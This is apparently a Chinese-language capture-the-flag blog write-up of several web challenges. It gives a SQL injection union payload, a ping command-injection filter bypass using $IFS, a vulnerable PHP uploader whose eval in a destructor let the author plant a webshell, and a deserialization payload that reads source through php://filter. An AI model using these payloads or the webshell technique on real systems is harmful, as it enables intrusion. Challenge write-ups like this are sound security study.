V&N赛高!这次体验不错 做完web就看师傅们ak别的题目了
把自己出来的几道web题解放上来

BabySqli

题目给了语句 构造联合查询

name=adm'union select 1,'admin','e10adc3949ba59abbe56e057f20f883e'#&pw=123456 

GXY{y0u_4re_not_aDmin!}

ping ping ping

题目是一个执行Ping命令的窗口 过滤了大多数符号和flag还有空格
img

1;cat$IFSls; 让cat执行ls的结果

参考文章http://www.it1352.com/757355.html

BabysqliV3.0

登陆口admin password上去upload目录能读源码

<meta http-equiv="Content-Type" content="text/html; charset=utf-8" /> 

<form action="" method="post" enctype="multipart/form-data">

ä¸Šä¼ æ–‡ä»¶

<input type="file" name="file" />

<input type="submit" name="submit" value="ä¸Šä¼ " />

</form>

<?php

error_reporting(0);

class Uploader{

public $Filename;

public $cmd;

public $token;

function __construct(){

$sandbox = getcwd()."/uploads/".md5($_SESSION['user'])."/";

$ext = ".txt";

@mkdir($sandbox, 0777, true);

if(isset($_GET['name']) and !preg_match("/data:\/\/ | filter:\/\/ | php:\/\/ | \./i", $_GET['name'])){

$this->Filename = $_GET['name'];

}

else{

$this->Filename = $sandbox.$_SESSION['user'].$ext;

}

$this->cmd = "echo '<br><br>Master, I want to study rizhan!<br><br>';";

$this->token = $_SESSION['user'];

}

function upload($file){

global $sandbox;

global $ext;

if(preg_match("[^a-z0-9]", $this->Filename)){

$this->cmd = "die('illegal filename!');";

}

else{

if($file['size'] > 1024){

$this->cmd = "die('you are too big (′▽`〃)');";

}

else{

$this->cmd = "move_uploaded_file('".$file['tmp_name']."', '" . $this->Filename . "');";

}

}

}

function __toString(){

global $sandbox;

global $ext;

// return $sandbox.$this->Filename.$ext;

return $this->Filename;

}

function __destruct(){

if($this->token != $_SESSION['user']){

$this->cmd = "die('check token falied!');";

}

eval($this->cmd);

}

}

if(isset($_FILES['file'])) {

$uploader = new Uploader();

$uploader->upload($_FILES["file"]);

if(@file_get_contents($uploader)){

echo "ä¸‹é¢æ˜¯ä½ ä¸Šä¼ çš„æ–‡ä»¶ï¼š<br>".$uploader."<br>";

echo file_get_contents($uploader);

}

}

?>

phar没打出来 一看文件名可控直接写进去个webshell- -问了下出题人说是非预期

后来看了眼可能是因为出题人手贱多在.前面打了个空格-。-然后正则匹配的就是' .'了 就相当于没写

图片加载不出来了- -不放了
用name控制文件名传上去webshell
然后蚁剑连

Do you know robot

robots.txt里给了源码的页面

?exp=O:10:"FileReader":4:{s:8:"Filename";s:58:"php://filter/read=convert.base64-encode/resource=index.php";s:5:"start";i:0;s:10:"max_length";i:10000;} 

get参数置空 post参数里传payload

另外几道web出的比群里的师傅们慢 没写wp就不放了
都比较简单

分类: 技术

0 条评论

发表评论

邮箱地址不会被公开。 必填项已用*标注